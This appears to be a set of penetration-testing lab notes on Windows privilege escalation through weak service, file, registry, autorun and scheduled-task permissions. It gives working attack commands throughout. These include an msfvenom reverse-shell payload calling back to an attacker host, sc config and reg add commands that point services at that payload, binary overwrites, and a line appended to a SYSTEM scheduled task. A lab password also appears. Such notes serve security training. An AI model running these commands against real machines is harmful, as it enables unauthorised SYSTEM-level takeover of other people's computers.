Weak Permissions
Services Issues
Permissive File System ACLs
Running SharpUp
Checking Permissions with icacls
EVERYONE
and BUILTIN\Users
groups have been granted full permissions to the directory
Replacing Service Binary
Make a backup of the original binary and replace it with a malicious binary generated with msfvenom
. It can give us a reverse shell as SYSTEM
, or add a local admin user and give us full administrative control over the machine.
Weak Service Permissions
Checking Permissions with AccessChk
All Authenticated Users have SERVICE_ALL_ACCESS rights over the service
Check Local Admin Group
htb-student
is not a member.
Changing the Service Binary Path
Stopping and Starting Service
The command we placed in the binpath
will run even though an error message is returned. The service fails to start because the binpath
is not pointing to the actual service executable
Confirming Local Admin Group Addition
Cleanup
Other example - Insecure Service Permissions
Before starting exploitation
- Create a reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f exe -o reverse.exe
- Transfer reverse.exe on the victim machine
Exploitation
Use AccessChk to check the user account's permissions on the service. Ex with username 'user' et service 'daclsvc':
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
Permission to change config files:
SERVICE_CHANGE_CONFIG
Query the service:
sc qc daclsvc
If the service runs with SYSTEM privileges (
SERVICE_START_NAME
)Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe:
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start daclsvc
Other example - Insecure Service Executables
Query the "filepermsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).:
sc qc filepermsvc
Using accesschk.exe, note that the service binary (BINARY_PATH_NAME) file is writable by everyone:
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
Copy the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation) and replace the filepermservice.exe with it:
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start filepermsvc
Unquoted Service Path
Service Binary Path
Windows will attempt to load the following potential executables in order on service start, with a .exe being implied:
C:\Program
C:\Program Files
C:\Program Files (x86)\System
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64
If we can create the following files, we would be able to hijack the service binary and gain command execution in the context of the service, in this case, NT AUTHORITY\SYSTEM
.
C:\Program.exe\
C:\Program Files (x86)\System.exe
However, creating files in the root of the drive or the program files folder requires administrative privileges.
Searching for Unquoted Service Paths
Example - IObitUnSvr
No right to write on path
Get-ServiceAcl.ps1: https://gist.github.com/cube0x0/1cdef7a90473443f72f28df085241175
Rights to change config
Other example - Unquoted Service Path
Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.
sc qc unquotedsvc
Ex:BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
Copy the reverse.exe (cf. Insecure Service Permissions - before starting exploitation) executable you created to this directory and rename it Common.exe:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start unquotedsvc
Permissive Registry ACLs
Checking for Weak Service ACLs in Registry
Changing ImagePath with PowerShell
Other example - Weak Registry Permissions
Query the "regsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) :
sc qc regsvc
Using accesschk.exe, note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users):
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
Overwrite the ImagePath registry key to point to the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation)
:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start regsvc
Modifiable Registry Autorun Binary
Check Startup Programs
Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.
Other example - Registry - AutoRuns
Query the registry for AutoRun executables:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Using accesschk.exe, note that one of the AutoRun executables is writable by everyone:
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
Copy the reverse.exe executable you created (cf. Insecure Service Permissions - before starting exploitation) and overwrite the AutoRun executable with it:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it, however if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real world engagement, you would have to wait for an administrator to log in themselves!
rdesktop MACHINE_IP
Scheduled Task
View the contents of the C:\DevTools\CleanUp.ps1 script: type C:\DevTools\CleanUp.ps1
The script seems to be running as SYSTEM every minute. Using accesschk.exe, note that you have the ability to write to this file: C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created: echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.
Startup Apps
Writable ? C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Last updated